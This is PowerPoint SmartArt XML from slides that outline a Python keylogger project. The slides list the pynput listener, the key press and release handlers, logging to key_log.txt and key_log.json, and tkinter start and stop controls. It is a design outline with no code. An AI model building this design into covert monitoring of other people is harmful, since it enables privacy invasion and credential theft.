          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0066"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4.Keyboard Event Handlers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>on_press(key): Logs the key press and hold events, updates keys_used, and generates the JSON file</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>on_release(key): Logs the key release event, updates keys_used, generates the JSON file, and updates the text log.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB80902E-7F97-447D-88D8-04D08CF237FE}" type="parTrans" cxnId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" type="sibTrans" cxnId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2622105B-354A-455E-8C1C-5479F85199D2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>6.GUI </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>start_keylogger(): Starts the keylogger and updates the GUI status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>Stop_keylogger(): Stops the keylogger and  updates the GUI  status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{463513E4-F8BB-48E9-AB1F-39E799C65CBF}" type="parTrans" cxnId="{0E768EA6-B87F-4751-A314-81CE43522BD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4108A579-E36E-401E-895A-F89E345D79AE}" type="sibTrans" cxnId="{0E768EA6-B87F-4751-A314-81CE43522BD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>5.File Handling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>generate_text_log(key): Writes the accumulated keystrokes to key_log.txt.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
            <a:t>generate_json_file</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t>(keys_used): Writes the keystroke events to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
            <a:t>key_log.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t> in JSON format</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B3BF653-1576-40D9-B3DD-DDEBEC62E0DA}" type="parTrans" cxnId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" type="sibTrans" cxnId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EBEAA052-B204-4B8E-999B-BBCA56A2AB22}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="fgShape" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="linComp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="-95"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F0E90A3-9429-4BD7-B46F-161B8F845F70}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}"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8000" r="-68000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" type="pres">
      <dgm:prSet presAssocID="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9ECD5924-C6D0-4ACA-8255-BFC8851FA4E5}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}"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78C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" type="pres">
      <dgm:prSet presAssocID="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborY="404"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{036DDBC8-60AC-4813-A96F-FFACD0114598}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}"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Lst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{577CA70B-C1E8-4350-9574-4F3099E4E137}" type="presOf" srcId="{2622105B-354A-455E-8C1C-5479F85199D2}" destId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" srcOrd="1" destOrd="0" parTransId="{2B3BF653-1576-40D9-B3DD-DDEBEC62E0DA}" sibTransId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}"/>
    <dgm:cxn modelId="{9E56553C-1899-451C-987B-29DA9095AE54}" type="presOf" srcId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" destId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" srcOrd="0" destOrd="0" parTransId="{FB80902E-7F97-447D-88D8-04D08CF237FE}" sibTransId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}"/>
    <dgm:cxn modelId="{AEBA8E72-4C17-4CDD-BA77-6426532E2288}" type="presOf" srcId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" destId="{78C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{5FF99F54-1646-4610-8D38-32C4AD3F4DCA}" type="presOf" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{7BAF418D-51F5-45A5-A244-089D9579CC9F}" type="presOf" srcId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" destId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{D404D69A-31EB-4EED-B800-010595E854F1}" type="presOf" srcId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" destId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{0E768EA6-B87F-4751-A314-81CE43522BD8}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{2622105B-354A-455E-8C1C-5479F85199D2}" srcOrd="2" destOrd="0" parTransId="{463513E4-F8BB-48E9-AB1F-39E799C65CBF}" sibTransId="{4108A579-E36E-401E-895A-F89E345D79AE}"/>
    <dgm:cxn modelId="{3DAC01D5-EA43-45BD-AA2F-B75C77BB6726}" type="presOf" srcId="{2622105B-354A-455E-8C1C-5479F85199D2}" destId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{316EC1DA-2240-4F8F-B997-FE9AF206E280}" type="presOf" srcId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" destId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{0C6A7BF5-99BE-4924-A848-5741D5C52A7D}" type="presOf" srcId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" destId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{E1CEBD7E-AC0A-499E-BC95-EAC0660D3AC8}" type="presParOf" srcId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" destId="{EBEAA052-B204-4B8E-999B-BBCA56A2AB22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{E066F7A2-F234-4DFB-B7F9-2176AE02C223}" type="presParOf" srcId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" destId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FE5EECE5-FE82-4D87-89B4-4BD65969E284}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{EF7B3B71-709E-45F7-B546-E2D3DC0E608B}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FCF0746F-2560-4B79-A498-3CE9D71B0401}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{AB9E839F-00D6-4874-9367-6C86706C820E}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{7F0E90A3-9429-4BD7-B46F-161B8F845F70}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{9871971F-5C5C-4D25-93FF-DF9466664035}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{5760FAAE-9A6F-4D3E-8CEA-C97E71186BEC}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{FB800897-CB0D-4FF7-9634-6ECD3670496D}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A84E724E-BFBC-4D3D-8CB6-8235AD20B00F}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A5CAB307-C5A4-46D3-B08C-AF5731C533A0}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{EBE864E7-7235-4960-B8AF-F8BCD27DF882}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{9ECD5924-C6D0-4ACA-8255-BFC8851FA4E5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{CA431248-E1BD-49DC-A076-F292870F6B39}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{A5298F83-D0D1-42DF-8B2A-4698D953BFED}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{78C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{418603C4-5457-4297-8B11-C147B04C82DB}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{71CD06E5-9240-45DC-979E-DBC68883208E}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{70FD96ED-D73A-44D1-B897-1F213A97C8C4}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{8FEEFDA0-31A1-4931-8355-AD70279B4933}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{036DDBC8-60AC-4813-A96F-FFACD0114598}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{DE9CFAFE-AC32-4891-ABB5-A9E83624E126}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>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AC43-E4B8-4972-AF33-EFEA7466E88F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-227300" y="228969"/>
          <a:ext cx="1515333" cy="106073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1.Libraries and Modules:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="532036"/>
        <a:ext cx="1060733" cy="454600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4168399" y="-3105996"/>
          <a:ext cx="984966" cy="7200299"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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tkinter: Used to create the GUI.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>pynput.keyboard: Used to listen for keyboard events (key presses and releases).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>json: Used to save the logged keystrokes in JSON format.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1060733" y="49752"/>
        <a:ext cx="7152217" cy="888802"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8B06AF12-19C3-472D-B00C-49FAA7D775DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-227300" y="1600182"/>
          <a:ext cx="1515333" cy="106073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2.Variables:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="1903249"/>
        <a:ext cx="1060733" cy="454600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4168399" y="-1734783"/>
          <a:ext cx="984966" cy="7200299"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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keys_used: A list to store the keys along with their state (pressed, held, released).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>flag: A boolean flag to manage the state of key press and hold.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>keys: A string to accumulate all keystrokes for logging in a text file.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1060733" y="1420965"/>
        <a:ext cx="7152217" cy="888802"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51BD275B-9670-4E3E-878A-95D00B8730CC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-227300" y="2971395"/>
          <a:ext cx="1515333" cy="106073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3.Functions:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="3274462"/>
        <a:ext cx="1060733" cy="454600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}">
      <dsp:nvSpPr>
